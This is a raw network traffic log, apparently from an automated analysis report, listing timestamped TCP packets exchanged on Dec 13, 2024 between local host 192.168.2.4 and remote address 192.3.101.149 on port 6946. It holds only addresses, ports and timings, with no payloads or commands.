                                                                                                                                                            Dec 13, 2024 07:38:46.482096910 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.484702110 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.484833956 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.485426903 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.487468958 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.487571001 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.488396883 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.490065098 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.490153074 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.490202904 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.492671967 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.492698908 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.493423939 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.495250940 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.495430946 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.495996952 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.497837067 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.497957945 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.498008966 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.500360012 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.500490904 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.501435041 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.502770901 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.502907991 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.504324913 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.505260944 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.505290031 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.505338907 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.507749081 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.507808924 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.507855892 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.510040045 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.510222912 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.510272980 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.512439013 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.512638092 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.512696028 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.514750004 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.514858961 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.514906883 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.517045021 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.517151117 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.517416000 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.519368887 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.519501925 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.520507097 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.521676064 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.521745920 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.521809101 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.523893118 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.524008989 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.524127960 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.526124954 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.526299953 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.526453018 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.528352022 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.528669119 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.528722048 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.530652046 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.530781031 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.530822992 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.532831907 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.532960892 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.533004999 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.535047054 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.535164118 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.535212994 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.537280083 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.537348032 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.537419081 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.539510965 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.539665937 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.539717913 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.541738033 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.541812897 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.541856050 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.544306993 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.544493914 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.544534922 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.546181917 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.546256065 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.546319008 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.548378944 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.548516035 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.548599958 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.550609112 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.550734043 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.550786018 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.552999020 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.553246975 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.553292990 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.555088043 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.555176973 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.555305004 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.557296038 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.557459116 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.557508945 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.559531927 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.559647083 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.559694052 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.561805964 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.561966896 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.562025070 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.563962936 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.564074039 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.565429926 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.566176891 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.566288948 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.566333055 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.568424940 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.568617105 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.568669081 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.570652962 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.570775986 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.570823908 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.572856903 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.572982073 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.573028088 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.575086117 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.575215101 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.575261116 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.577296972 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.577414036 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.579243898 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.579524040 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.579665899 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.579921961 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.581763983 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.581906080 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.582592010 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.583982944 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.584084988 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.584124088 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.586263895 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.586376905 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.586430073 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.588424921 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.588551998 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.588601112 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.590609074 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.643459082 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.665663004 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.665677071 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.665793896 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.666341066 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.666706085 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.666743994 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.668107986 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.668118954 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.668171883 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.670052052 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.670063019 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.670109034 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.671854973 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.671873093 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.671928883 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.673293114 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.673305988 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.673340082 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.674751997 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.674762011 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.674835920 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.676121950 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.676132917 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.676167965 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.676538944 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.676551104 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.676587105 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.679258108 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.679899931 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.679953098 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.681257010 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.681405067 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.681925058 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.681936979 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.681947947 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.681957960 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.681977987 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.682008982 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.683295012 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.683408976 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.683552027 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.684735060 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.684851885 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.684897900 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.686182976 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.686281919 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.686330080 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.687676907 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.687755108 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.689086914 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.689137936 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.689181089 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.689419985 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.690541029 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.690642118 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.690687895 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.691869020 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.691992998 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.692043066 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.693310022 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.693464041 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.694628954 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.694686890 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.694753885 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.694799900 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.696093082 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.696211100 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.696268082 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.697376013 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.697536945 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.697586060 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.698729038 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.698801041 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.699390888 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.700076103 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.700191021 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.700238943 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.701447964 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.701539993 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.701594114 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.702792883 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.702879906 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.704090118 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.704143047 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.704186916 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.705421925 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.705427885 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.705527067 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.705573082 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.706720114 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.706810951 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.706861019 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.708045959 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.708131075 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.708183050 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.709312916 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.709410906 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.710639000 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.710688114 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.710714102 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.711857080 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.711900949 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.711983919 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.712023020 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.713124037 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.713238001 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.713289022 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.714361906 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.714461088 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.714521885 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.715682983 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.715781927 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.716918945 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.716967106 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.717088938 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.717143059 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.718301058 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.718312979 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.718358994 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.719461918 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.719558001 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.720710039 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.720762968 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.720830917 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.721424103 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.721980095 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.722575903 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.723179102 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.723809004 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.723820925 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.723864079 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.724495888 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.724611998 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.724704981 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.725788116 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.725810051 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.725858927 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.727227926 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.727292061 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.727344036 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.728329897 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.728398085 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.729424953 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.729633093 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.729836941 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.730864048 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.730907917 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.730974913 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.732110023 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.732182026 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.732320070 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.732367992 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.733380079 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.733481884 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.733532906 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.734694004 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.734776974 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.734827042 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.735968113 CET694649742192.3.101.149192.168.2.4
